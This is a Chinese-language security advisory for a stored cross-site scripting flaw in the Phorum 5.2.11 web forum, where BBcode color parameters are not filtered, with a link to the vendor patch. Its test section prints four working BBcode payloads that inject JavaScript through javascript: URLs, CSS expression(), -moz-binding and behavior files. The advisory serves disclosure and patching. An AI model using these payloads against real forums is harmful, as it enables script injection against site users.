发布日期：2009-07-22
更新日期：2009-07-23

受影响系统：

Phorum Phorum 5.2.11

不受影响系统：

Phorum Phorum 5.2.12a

描述：

---

BUGTRAQ  ID: 35777

Phorum是一款基于PHP的WEB论坛程序，可在Linux和Unix操作系统下使用，也可在Microsoft Windows操作系统下使用。

Phorum的过滤引擎没有充分地验证某些BBcode参数，远程攻击者可以在所提交的请求中使用导致注入并执行恶意JavaScript代码。

<*来源：crashfr （crashfr@sysdream.com）
  
  链接：http://milw0rm.com/exploits/9231
        http://secunia.com/advisories/35928/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

[color=#000000;background-image:url(javascript:alert('Sysdream_IE6_Alert'));]Sysdream Testing IE6[/color]
[color=#000000;xss:expression(alert('Sysdream_IE7_Alert'));]Sysdream Testing XSS[/color]
[color=#000000;-moz-binding:url(http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream Testing FF[/color]
[color=#000000;behavior:url(http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream Testing FF[/color]

建议：

---

厂商补丁：

Phorum
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.phorum.org/phorum5/read.php?64,139411

浏览次数：2310
严重程度：0（网友投票）